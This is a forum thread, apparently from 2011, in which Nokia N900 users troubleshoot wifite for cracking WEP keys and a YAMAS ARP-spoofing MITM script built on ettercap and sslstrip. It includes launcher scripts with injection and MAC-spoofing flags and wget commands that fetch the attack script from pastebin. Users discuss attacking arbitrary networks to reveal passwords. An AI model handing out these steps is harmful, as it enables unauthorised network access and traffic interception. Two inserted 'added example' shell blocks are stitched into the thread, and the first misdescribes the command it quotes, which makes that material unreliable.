It seems that the only errors you get are the pexpect one and the python-tk one, although they are not needed for the attack... Try an apt-get install pexpect, but I don't think it will do much. Is your python up-to-date?

Sorry but I can't really think about any cause for your problem, if you have carefully followed the guide and you're using the modified kernel-power or kernel-power v47 wifite should work properly, you are the first encountering problems. :confused:

Yes, my python version is the latest. And I think what happened is because home3 (my network) is an ad-hoc network [shared LAN connection through a wireless laptop].
Is there a way that I can choose which network to crack, so it doesn't automatically choose home3?

vi_
2011-06-18, 16:50
Yes. Edit the 'wepon' script and comment out the line that puts the device into monitor mode. This will force wifite to put your card into monitor mode (didn't work right for me, apparently worked for mr_pingu).

This will cause wifite to enter a different scan mode and allow network selection.

q6600
2011-06-18, 17:01
hi
after 10 h of playing with my n900 (flash and install all ...) I managed to install the script but ...

AgogData
2011-06-18, 18:34
I'm now stuck with arp replay attack on XXXX captured # ivs
then chop-chop attack
what is wrong here ?

torpedo48
2011-06-18, 18:58
I really don't know what's going on here, there's obviously something wrong with your wifites but... What? I've tried searching for wifite's dependencies but they all seem to be satisfied here.

Have you used particular tweaks and/or procedures that may have f*****d up your wifi's or network's settings?

q6600
2011-06-18, 18:59
new pic better quality
i flash my n900 and install all from 0 no tweaks
also injection rate is slow. any tips ...

AgogData
2011-06-18, 19:03
I really don't know what's going on here, there's obviously something wrong with your wifites but... What? I've tried searching for wifite's dependencies but they all seem to be satisfied here.

Have you used particular tweaks and/or procedures that may have f*****d up your wifi's or network's settings?

Nope, nothing at all
did this work for someone else here?
should I edit wepon like vi_ and mr_pingu said, to be like this:

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
airmon-ng start wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
airmon-ng start wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

i.e.: airmon-ng start wlan0 instead of ifconfig wlan0

torpedo48
2011-06-18, 19:21
Nope, nothing at all
did this work for someone else here?
should I edit wepon like vi_ and mr_pingu said, to be like this:

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
airmon-ng start wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
airmon-ng start wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

i.e.: airmon-ng start wlan0 instead of ifconfig wlan0

No, content of wepon should be:

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

And yes, it works for me and many others.

q6600
2011-06-18, 19:29
Success,
I didn't waste a day trying to get this working :o.
http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

but make sure you put the codes

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


http://talk.maemo.org/showthread.php?t=74081

mr_pingu
2011-06-18, 19:29
If something is not right you should load the drivers manually by cd into the drivers folder and sh load.sh ;)

Then do python /opt/wifi_mon/wifite.py
Or better download wifite.py from wifite homepage and do python /home/user/MyDocs/wifite.py

This way you filter out any error in vi_'s script, but I am almost sure there is nothing wrong with vi_'s script!!!

torpedo48
2011-06-18, 19:33
Success,
I didn't waste a day trying to get this working :o.
http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

but make sure you put the codes

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


http://talk.maemo.org/showthread.php?t=74081

Sorry, I can't understand where the error was. Is that something wrong in my guide? What have you done in order to succeed?

q6600
2011-06-18, 19:37
I installed step by step from your website but it is not working. I didn't see the codes on your website

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


the program worked after I put the codes in manually. I don't know why.

torpedo48
2011-06-18, 19:39
I installed step by step from your website but it is not working. I didn't see the codes on your website

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

#!/bin/sh
/opt/wifi_mon/unload.sh

That's because they are included in Step 3's package, try downloading it, extracting wepon and wepoff and read them, ta-daaaaaa codes inside ;)

q6600
2011-06-18, 19:46
dooohhh
man sorry i am a noob

torpedo48
2011-06-18, 19:49
dooohhh
man sorry i am a noob

No problem, we all started somewhere ;)

Could you please tell me where your error was, so that I can make the guide even easier? You didn't properly follow step 3, did you? :)

q6600
2011-06-18, 19:54
please look on post 62
then I put the codes in xterm (as root) and the program worked

mr_pingu
2011-06-18, 20:07
Only load the bleeding edge drivers and let wifite do the rest ;)
Proof attached :P :D

I ran it without the --power --pps and --anon, just normal


You may like this piece of code which has the anonymous mode, power above 12 and 500 packets per second still enabled as vi_ proposed ;)

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

AgogData
2011-06-18, 20:32
At the beginning of the attack it says that packages pyrit and cowpatty are missing, should I install them?

mr_pingu
2011-06-18, 20:42
nope, it will run fine without them, macchanger should you install tho ;)

szopin
2011-06-19, 07:41
You can run the non-patched wifite.py, just give your /tmp more space as it dumps .ivs there (standard 1MB allows for only ~70000, so 32MB should be enough for anybody):

sudo mount -o remount,size=32M /tmp

and you're good to go

pusak gaoq
2011-06-19, 08:22
I'm new to this so-called wepon... I have installed everything and am able to run the program, with just one question???
after we start attacking any connection, will the password be revealed at the end or do we have to decrypt it like aircrack????
I'm asking because I couldn't run the program to the end due to a dried-out battery...

eefo
2011-06-19, 08:24
I'm new to this so-called wepon... I have installed everything and am able to run the program, with just one question???
after we start attacking any connection, will the password be revealed at the end or do we have to decrypt it like aircrack????
I'm asking because I couldn't run the program to the end due to a dried-out battery...

yes it shows the exact password as saved by the user ;)


http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

look at the end part of the video it will answer you :P

mr_pingu
2011-06-19, 10:32
You can run the non-patched wifite.py, just give your /tmp more space as it dumps .ivs there (standard 1MB allows for only ~70000, so 32MB should be enough for anybody):

sudo mount -o remount,size=32M /tmp

and you're good to go

Thanks

Since I don't like /tmp taking up root space, can't we mount it on opt? Dang, here you see I am only a 3 months old linux user and lack experience :(
Generally I want to have /tmp/ taking up /opt/ space instead of root space since I don't like the idea of root becoming full after using this. Maybe symlinking?

vi_
2011-06-19, 11:34
Thanks

Since I don't like /tmp taking up root space, can't we mount it on opt? Dang, here you see I am only a 3 months old linux user and lack experience :(
Generally I want to have /tmp/ taking up /opt/ space instead of root space since I don't like the idea of root becoming full after using this. Maybe symlinking?

Fret not my son.

All we have to do is change where wifite dumps its temporary files.

run in xterm:

sudo sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py; sudo mkdir -p /opt/tmp

This edits wifite to use /opt/tmp as the tmp folder, then checks to see if /opt/tmp exists and creates it if not.

Voilà, no more /tmp/ restrictions!
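
Added example (shell), not vi_'s command or wifite's own code: it packages the /tmp capacity problem szopin raised (1 MB of tmpfs fills after roughly 70000 IVs) and vi_'s sed edit above into functions you can run before a capture. `free_kb`, `pick_capture_dir` and `relocate_mkdtemp` are names chosen here; `demo` applies the edit to a constructed stand-in for wifite.py rather than the real file. The directory is created with `mkdir -p`, because the quoted one-liner's `sudo if [ ... ]` is not valid shell (`if` is a keyword, not a command sudo can run). Run as root when pointing it at /opt/wifi_mon/wifite.py and /opt/tmp.

```shell
#!/bin/sh
# Added example, not the thread's own script: check free space before a
# capture and relocate a tool's temp directory. Assumes the target script
# creates its temp dir with tempfile.mkdtemp(prefix='wifite'), as the
# thread states for wifite.py. Function names are chosen here.

# free_kb DIR: free space (KiB) on the filesystem that holds DIR.
free_kb() {
    df -Pk "$1" | awk 'NR == 2 { print $4 }'
}

# pick_capture_dir REQUIRED_KB DIR...: print the first writable DIR with
# at least REQUIRED_KB free; exit status 1 if none qualifies. A 1 MB
# tmpfs /tmp fails a 32768 KiB requirement, /opt/tmp on the larger
# partition passes it.
pick_capture_dir() {
    need=$1; shift
    for d in "$@"; do
        [ -d "$d" ] && [ -w "$d" ] || continue
        free=$(free_kb "$d") || continue
        [ -n "$free" ] || continue
        if [ "$free" -ge "$need" ]; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# relocate_mkdtemp SCRIPT PREFIX DIR: rewrite mkdtemp(prefix='PREFIX') in
# SCRIPT to mkdtemp(prefix='PREFIX',dir='DIR') and make sure DIR exists.
# Same sed as the post above; mkdir -p replaces the "sudo if [ ... ]" part.
# Run as root when SCRIPT and DIR are system paths.
relocate_mkdtemp() {
    script=$1; prefix=$2; dir=$3
    esc=$(printf '%s' "$dir" | sed 's#/#\\/#g')   # escape / for the s/// below
    sed -i "s/(prefix='$prefix')/(prefix='$prefix',dir='$esc')/g" "$script"
    mkdir -p "$dir"
}

# demo: apply the edit to a constructed stand-in for wifite.py (not the
# real file), print the patched line, then show directory selection.
demo() {
    work=$(mktemp -d)
    printf "import tempfile\ntemp = tempfile.mkdtemp(prefix='wifite')\n" > "$work/wifite.py"
    relocate_mkdtemp "$work/wifite.py" wifite "$work/opt_tmp"
    grep mkdtemp "$work/wifite.py"
    pick_capture_dir 1024 /nonexistent "$work"
    rm -rf "$work"
}
```

`pick_capture_dir 32768 /opt/tmp /tmp` is the shape of the call before a capture: it prints the first candidate with at least 32 MiB free and fails loudly when none has it, which is the condition that otherwise shows up only as a capture that stops mid-way.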

mr_pingu
2011-06-19, 11:53
Thanks, works for wifite.py :D But when you run ettercap (not through YAMAS) it also has the problem of /tmp being too small and stops capturing after some time

So that's why I asked too ;)

vi_
2011-06-19, 12:09
Thanks, works for wifite.py :D But when you run ettercap (not through YAMAS) it also has the problem of /tmp being too small and stops capturing after some time

So that's why I asked too ;)

Well you could symlink /tmp/ to /opt/tmp with

ln -s /tmp/ /opt/

or something. I don't know, just experiment. Might make your device non-bootable, might not.

Be brave and find out for the rest of us.

szopin
2011-06-19, 12:19
Dudes, resizing your /tmp is only until you reboot, so /opt problem solved. Wanna hack, get 31MB free, you still would have to.

vi_,

'%TMPDIR' is, I believe, what is in wifite.py, so your command might not work, no idea.

You seem to be a mighty linux guy, can/could you pinpoint the part in wifite.py that dumps ivs there and deletes them on exit? It always uses the wep01.ivs filename, and with the -p0841 attack it would be really great if it dumped it and did not delete it after an unsuccessful crack. Sometimes running twice/thrice is required.

vi_
2011-06-19, 12:51
Dudes, resizing your /tmp is only until you reboot, so /opt problem solved. Wanna hack, get 31MB free, you still would have to.

vi_,

'%TMPDIR' is, I believe, what is in wifite.py, so your command might not work, no idea.

You seem to be a mighty linux guy, can/could you pinpoint the part in wifite.py that dumps ivs there and deletes them on exit? It always uses the wep01.ivs filename, and with the -p0841 attack it would be really great if it dumped it and did not delete it after an unsuccessful crack. Sometimes running twice/thrice is required.

wifite patch/script (http://talk.maemo.org/showpost.php?p=1031980&postcount=80) to remove tmp problem.

tmp is defined at the start of the program using python mkdtemp function/call/thingy.

If you felt that non-removal of -p0841 files would be of benefit I highly suggest you get in contact with the creator of wifite.py. I am not keen to 'butcher' his work and break compatibility with future upgrades.

szopin
2011-06-19, 12:55
Tried to, no reply so far (1 month) which is why I'm reaching to other people. If it's addition (or removal) of one line, doesn't seem that butchery to me :P

<edit> Still after each update we have to change AUTOCRACK=9000 to a higher value as that kills N900 processor and is highly unlikely in most situations

mr_pingu
2011-06-19, 13:27
After some tests I see that rootfs space is unaffected by the size of /tmp/
I made tmp 16 MB and copied a music file of 8MB to it, ran df -h and I saw that rootfs space was still the same ;)

So god knows where the space from /tmp is pulled from :O as opt didn't change also... gonna investigate if we can set 32MB as default of /tmp on boot...


edit: Never changed the autocrack value :P Just put that ***** on 1GHz and you have the key in less than 4 minutes ;)

szopin
2011-06-19, 13:56
As the N900 seems to have a limit of around 200 packets/second it takes 6-7 mins to get 50000 ivs, which normally is enough. I noticed that -p0841 attacks sometimes generate dubious data, which is why I would love for the Wifite script to dump it and append, as 2-3 attacks is enough (maybe I got lucky and there was a casual user in the meantime, no idea) in most cases.

mr_pingu
2011-06-19, 14:14
Yes I had a pm with agogdata yesterday and I already told him that the pps limit is better to be set to 200 pps as it will work better for longer ranges and its a reasonable value for a mobile device :D

Yesterday I had cracked my own Network and that was to be exactly in 3 minutes and 36 seconds ;) That's the ideal situation tho :p

szopin
2011-06-19, 15:29
Yeah, with signal around -50 my own went swiftly in around 4 mins. In most _working_ cases it's 85-90 and getting 100+ is excellent. Having to manually copy the ivs from the auto-tool is a biatch though

AgogData
2011-06-19, 16:04
I'm just curious, can WPA networks be cracked ? cause it asks for a dictionary.
and upgrading wifite (thanks to mr_pingu) seems to work better but still no luck with cracking

szopin
2011-06-19, 17:27
WPA networks are out of reach mostly. If a user is so informed to not use WEP he is also informed to not use his child's name as password when switching to WPA. Though sometimes works

JamesBond@ge
2011-06-19, 18:00
Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

vi_
2011-06-19, 18:24
Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

Depends what it is you specifically want to do...

What are you wanting to do?

AgogData
2011-06-19, 18:45
Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?
No, you must have kernel-power v47, it's all in the 2nd post (what I'm using at least)

you bunch of sexeh geniuses, you! x
0_0 still with your weird posts i see

comaX
2011-06-19, 19:18
Google
http://pcsci3nce.info/?p=9
http://pcsci3nce.info/?p=11

As for the script - I haven't had the time to test it yet, however can it NOT be in this green font :X It is ugly :(

>< +1

I'll have a look at what you have done in the next few days and report back ;)

Too bad you split though, it might be a bit confusing for users, and counter productive. Check the original thread for a solution I thought about !

szopin
2011-06-19, 19:59
Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

Installing bleeding edge drivers will not brick your phone. Actually, most things you can type into it have no chance of doing that. If you are participating in gamma releases (which I doubt based on your post) you are free to f..k your phone as much as you can and it should still work. Mine does

stevomanu
2011-06-19, 21:01
just tried re-downloading the yamas-n900 script using the wget link and I get this error, any ideas?

/home/user # wget http://pastebin.com/raw.php?i=NtFnfJBt -O yamas_n900.sh && chmod +x ./yamas_n900
.shwget http://pastebin.com/raw.php?i=NtFnfJBt -O yamas_n900.sh && chmod +x ./yamas_n900.sh
--22:02:33-- http://pastebin.com/raw.php?i=NtFnfJBt
=> `yamas_n900.sh'
Resolving pastebin.com... 173.236.52.197
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

[ <=> ] 16,524 15.62K/s

22:02:34 (15.61 KB/s) - `yamas_n900.sh' saved [16524]

chmod: invalid option -- O
BusyBox v1.18.5 (Debian 1.18.5power1) multi-call binary.

Usage: chmod [-R] MODE[,MODE]... FILE...

Each MODE is one or more of the letters ugoa, one of the
symbols +-= and one or more of the letters rwxst

Options:
-R Recurse

/home/user #


many thanks

mr_pingu
2011-06-19, 21:04
Cd to script folder and do manually
chmod +x yamas_n900.sh

stevomanu
2011-06-19, 21:48
Cd to script folder and do manually

I did that in the end, thanks though. Also it still says ettercap is installed in usr/sbin/ettercap, shouldn't it be usr/bin/ettercap?

Dragoss91
2011-06-21, 10:05
This is what I got :-s

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait
[... countdown line rewritten in place once per second, truncated by the terminal width ...]
[+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 0 targets and 0 clients found

[+] there are no targets with a power level greater than 12dB
[+] try selecting a lower power threshold


Nokia-N900:~# wepoff
ifconfig: invalid hw-addr A0
Nokia-N900:~#

AgogData
2011-06-21, 10:10
Do you have the bleeding edge driver? And I prefer the manual usage of wifite as mr_pingu said:
1) load the bleeding edge driver
2) /opt/wifite-directory/wifite.py
That's how you can choose your target, and in earlier posts you can see how to set some settings (fake authentication, power)

Dragoss91
2011-06-21, 10:32
By the way , this hack can attack only WEP protected networks ? or WPA/WPA2 too ?

I used # python /opt/wifi_mon/wifite.py, the script ran and started searching for wifi networks but it didn't find anything, 0 wireless 0 results; after I pressed CTRL + C it told me to make sure airodump-ng runs correctly.

AgogData
2011-06-21, 10:35
only WEP, it asks for a dictionary for WPA

mr_pingu
2011-06-21, 15:14
only WEP, it asks for a dictionary for WPA

You can type none if it ask for a dictionary ;) Won't help that much though ;)

Estel
2011-06-21, 19:09
When I try to decompress wifite optimised for N900 from post 2 (wifi.tgz), I get the error "it doesn't look like a tar file". Tried both with tar -xzvf and Xarchiver. Downloaded 3 times, size seems to be correct. Any ideas?

torpedo48
2011-06-22, 11:37
If someone still has doubts about what the script in the OP is and what it does, I've made a video showing YAMAS in action:

http://www.youtube.com/watch?v=9bSq7tXSGAo

PS: vi_ is right, this script is like putting an AK-47 in a child's hand :)

jak
2011-06-22, 12:00
So, it's not related to hacking at all, but cracking. Please stop confusing people. The name of the thread makes it sound like a coding competition (as in hacking = coding), not like a tool for cracking things. Stop confusing us.

torpedo48
2011-06-22, 12:03
So, it's not related to hacking at all, but cracking. Please stop confusing people. The name of the thread makes it sound like a coding competition (as in hacking = coding), not like a tool for cracking things. Stop confusing us.

http://en.wikipedia.org/wiki/Hacker_(computer_security)

"A hacker is a person who breaks into computers and computer networks for profit, in protest, or because they are motivated by the challenge."

So this thread is pretty much about hacking I think.

If you read the article, you'll find that some people started a controversy about the hacker definition, so the word itself is confusing you, not us ;)

Joseph9560
2011-06-22, 12:20
I successfully broke my wifi network as well. 5 digit password within few minutes (about 5 I guess). In my case fourth attack brings fruit, first three types of attack fails. Plus when I reattacked the same network for second time it took about a minute or so excluding that count down time while searching for network.

Estel
2011-06-23, 20:59
If no one else has a problem with decompressing wifite, can I ask for it to be uploaded as a pure tarball, without compression? Sorry, I'm out of ideas why the archive appears corrupted to me, no matter how many times I redownload it.

vi_
2011-06-23, 21:14
If no one else has a problem with decompressing wifite, can I ask for it to be uploaded as a pure tarball, without compression? Sorry, I'm out of ideas why the archive appears corrupted to me, no matter how many times I redownload it.

Just this once, just for you estel.

here. (http://ifile.it/dbk6rzh)

pursueky
2011-06-23, 21:55
Just this once, just for you estel


here. (http://ifile.it/dbk6rzh)

kia-N900:~# wget http://pastebin.com/raw.php?i=z4uBgt64 -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh
--22:49:12-- http://pastebin.com/raw.php?i=z4uBgt64
=> `./yamas_n900.sh'
Resolving pastebin.com... 173.236.52.197
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: /z4uBgt64 [following]
--22:49:15-- http://pastebin.com/z4uBgt64
=> `./yamas_n900.sh'
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
22:49:16 ERROR 404: Not Found.

maemouser1
2011-06-25, 12:05
Hi was the script moved or something? Unknown paste ID.

Can you re-up please? Thanks

stevomanu
2011-06-25, 12:21
this script works amazingly, check it out

http://talk.maemo.org/showthread.php?t=73988

vi_
2011-06-25, 13:08
Hi was the script moved or something? Unknown paste ID.

Can you re-up please? Thanks

see first post.

http://pastebin.com/u5nLZzra

vi_
2011-06-25, 13:08
this script works amazingly, check it out

http://talk.maemo.org/showthread.php?t=73988

orly? last time I checked it is STILL broken.

stevomanu
2011-06-25, 13:12
orly? last time I checked it is STILL broken.

sorry to say dude but that script does work, I tried it this morning and all was fine ....

one question though, what is different between that and the one you just posted??

pursueky
2011-06-25, 14:03
update: new version, everything fixed now:o

You have probably seen the YAMAS MITM ARP spoof script that was recently announced. While an interesting idea, it was not written with the N900 in mind. Thus, it had numerous points that needed addressing before it could be considered ready for N900.


Greetz!

Thanks to comax for writing the thing.

Unhuman for hosting, alerting us to it.

Torpedo48 for testing, development.

Here I present a more N900 friendly version. This is better than the original because:

it has far fewer dependencies
is more compatible with a stock N900
it shuts down ettercap nicely without barfing on the router's ARP table.

http://i54.tinypic.com/feqxpi.png

REQUIREMENTS:

iptables
nmap
iproute
python-twisted-web
python-openssl
python-scapy
libpcap0.8
libpcre3
sslstrip*see below
ettercap*see below

*Installation guide for ettercap, sslstrip and many other tools can be found at: http://pcsci3nce.info/?p=9

Refer to unhumans original post (http://talk.maemo.org/showthread.php?t=73988) and blog (http://pcsci3nce.info/?p=291) for more details.

Script here:

link (http://pastebin.com/u5nLZzra)


Installer!

navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=u5nLZzra -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

but it doesn't run in:
sh yamas_n900.sh
or
bash yamas_n900.sh

the same error loads as:
/home/user/MyDocs # bash yamas_n900.sh
: command not found 4:
'amas_n900.sh: line 26: syntax error near unexpected token `in
'amas_n900.sh: line 26: ` case $1 in
/home/user/MyDocs # sh yamas_n900.sh
: not foundsh: line 4:
yamas_n900.sh: line 26: syntax error: unexpected word (expecting "in")
/home/user/MyDocs #
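
Added example (shell), not from the thread or from the yamas script: a pre-flight check for a script fetched with wget. The two errors quoted above are the textbook symptoms of CRLF line endings. bash reports the token as `in<CR>'`, and the carriage return moves the cursor back to column 0, so the closing quote overwrites the `y` of `yamas_n900.sh` and the line reads `'amas_n900.sh: line 26: ...`; line 4 likewise prints `yamas_n900.sh: line 4: <CR>: command not found`, which after the cursor return shows as `: command not found 4:`, and the ash output `: not foundsh: line 4:` is the same overwrite. That the re-uploaded paste fixed it for pursueky fits that reading, but whether the paste carried CRLF is an assumption; the check itself is general. Function names are chosen here.

```shell
#!/bin/sh
# Added example, not the thread's own script: verify a downloaded shell
# script before executing it. Detects CRLF endings, strips them with a
# backup, and parse-checks the script with its own interpreter (-n only,
# nothing in the script is executed). Function names are chosen here.

# has_crlf FILE: exit 0 if any line ends in CR LF.
has_crlf() {
    grep -q "$(printf '\r')\$" "$1"
}

# shebang_of FILE: print the interpreter named on the first line, or nothing.
shebang_of() {
    head -n 1 "$1" | sed -n 's/^#![[:space:]]*//p'
}

# strip_crlf FILE: rewrite FILE in place with LF endings, keeping FILE.crlf.bak.
strip_crlf() {
    cp "$1" "$1.crlf.bak"
    tr -d '\r' < "$1.crlf.bak" > "$1"
}

# check_script FILE: exit 0 only if FILE has LF endings and parses cleanly
# with the interpreter its shebang names (bash or sh/ash; sh when absent).
check_script() {
    f=$1
    if has_crlf "$f"; then
        echo "$f: CRLF line endings found; run strip_crlf first" >&2
        return 1
    fi
    interp=$(shebang_of "$f")
    case "$interp" in
        *bash*)   bash -n "$f" ;;
        *sh*|"")  sh -n "$f" ;;
        *) echo "$f: unhandled interpreter '$interp'" >&2; return 1 ;;
    esac
}

# demo: constructed script with CRLF endings (not the real yamas paste),
# showing the failing check, the fix, and the passing check.
demo() {
    work=$(mktemp -d)
    printf '#!/bin/sh\r\ncase $1 in\r\n  on) echo on ;;\r\nesac\r\n' > "$work/example.sh"
    check_script "$work/example.sh" || echo "as expected: rejected"
    strip_crlf "$work/example.sh"
    check_script "$work/example.sh" && echo "clean after strip_crlf"
    rm -rf "$work"
}
```

Usage after `wget ... -O ./yamas_n900.sh`: `check_script ./yamas_n900.sh && chmod +x ./yamas_n900.sh`; `sh -n` reports the same "unexpected word (expecting "in")" error on the original file that running it would, without running it.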

vi_
2011-06-25, 14:35
but it doesn't run in:
sh yamas_n900.sh
or
bash yamas_n900.sh

the same error loads as:
/home/user/MyDocs # bash yamas_n900.sh
: command not found 4:
'amas_n900.sh: line 26: syntax error near unexpected token `in
'amas_n900.sh: line 26: ` case $1 in
/home/user/MyDocs # sh yamas_n900.sh
: not foundsh: line 4:
yamas_n900.sh: line 26: syntax error: unexpected word (expecting "in")
/home/user/MyDocs #

Try again.

comaX
2011-06-25, 15:09
orly? last time is checked it is STILL broken.

I swear I could have said the same about yours. Please stop using the name yamas, as well as my parsing method (that you really fcuked up by the way. I mean, guys, if you want something that doesn't work, sure go for this.).
The rest of the code is free for anyone to use, modify and stuff.

I'll leave you some time to do so, after what I'll have to ask some higher authority to comply.

For those who want a version that DOES work (even though it still needs two dependencies more), head to http://talk.maemo.org/showthread.php?p=1038881#post1038881
It's currently being "converted" to work with ash. ETA : 3-4 days (due to my moving out, I don't have much time !). As for osso-xterm, I'll see that later on, I really don't feel it's a priority.

pursueky
2011-06-25, 15:09
Try again.

it does work again

but how should I handle this? I am new to ettercap.

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 70)
Listening on wlan0...
ERROR : 92, Protocol not available
[ec_capture.c:capture_init:146]

pcap_open: wlan0: That device is not up

haffid
2011-06-25, 16:51
It's working so fine, thank you so much, I'm so happy

q6600
2011-07-01, 15:40
I have some problems with wepon, the first time the program worked fine, now I get this all the time ... any hints?

Straycat
2011-07-02, 08:38
Hi all.

When I try to reveal my wep key I always get a: "fake authentication unsuccessful".

Additionally 'wepoff' always says: "ifconfig: invalid hw-addr 00".

And I think that is not ok, right?

Thanks in advance.

AgogData
2011-07-02, 08:49
Hi all.

When I try to reveal my wep key I always get a: "fake authentication unsuccessful".

Additionally 'wepoff' always says: "ifconfig: invalid hw-addr 00".

And I think that is not ok, right?

Thanks in advance.

1- "ifconfig: invalid hw-addr 00" is normal, your wifi is back to normal now
2- I would recommend using the more manual method:
root
python /opt/wifi_mon/wifite.py
and if the fake authentication didn't pass through you can add --force-fake or --fake-force, I don't really remember, so it should be like
python /opt/wifi_mon/wifite.py --force-fake
(I don't even remember if it's -- or -, so you should try it 4 times :) )

mr_pingu
2011-07-02, 10:15
1- "ifconfig: invalid hw-addr 00" is normal, your wifi is back to normal now
2- I would recommend using the more manual method:
root
python /opt/wifi_mon/wifite.py
and if the fake authentication didn't pass through you can add --force-fake or --fake-force, I don't really remember, so it should be like
python /opt/wifi_mon/wifite.py --force-fake
(I don't even remember if it's -- or -, so you should try it 4 times :) )

Whooo learning fast agog :D

It's "--force-fake" or simply "-f" ;)

AgogData
2011-07-02, 10:25
Whooo learning fast agog :D

It's "--force-fake" or simply "-f" ;)

I keep forgetting everything =D

Saturn
2011-07-02, 10:41
1- "ifconfig: invalid hw-addr 00" is normal, your wifi is back to normal now
...

That comes from an error in the original unload.sh script.

There are several ways to correct it. I have posted a solution here: http://talk.maemo.org/showpost.php?p=1039469&postcount=183

JamesBond@ge
2011-07-02, 11:18
I love you guys

AgogData
2011-07-02, 15:07
I have some problems with wepon; the first time the program worked fine, now I get this all the time... any hints?

I used to have the same issue you're having here, but in my case I was far from the router. Try to get close and try many times.
On my phone attacking goes until 9000 IVs and cracking is at a maximum of 25000 IVs.
Just don't give up and try many times, I managed to crack after some time with the help of my friend mr_pingu :)

q6600
2011-07-02, 15:28
My router is close to me, 3 m. I try and I try but still no luck.

AgogData
2011-07-02, 16:16
Do you have the bleeding edge driver installed? And how do you load it?

q6600
2011-07-02, 18:57
I got the bleeding edge installed. I tried with wlan selector and I tried manual, same results.

AgogData
2011-07-03, 06:17
Then try this as a last option, and I don't know if it works or not:
1- download cowpatty http://www.mediafire.com/?8q4jc4cv82oclpl
2- move it to /usr/bin and chmod +x it
3- restart your phone
x- try other networks

nafajafam
2011-07-03, 07:26
I am getting estimated wait times around 2 hours. Is that normal?

casper27
2011-07-03, 07:38
I am getting estimated wait times around 2 hours. Is that normal?
Depends how fast you are injecting packets, but it seems quite a wait. Take for example: you should need about 50,000 IVs. The N900 should easily be able to inject about 200 packets per second, so
50000 / 200 = 250
250 / 60 = 4.16 mins
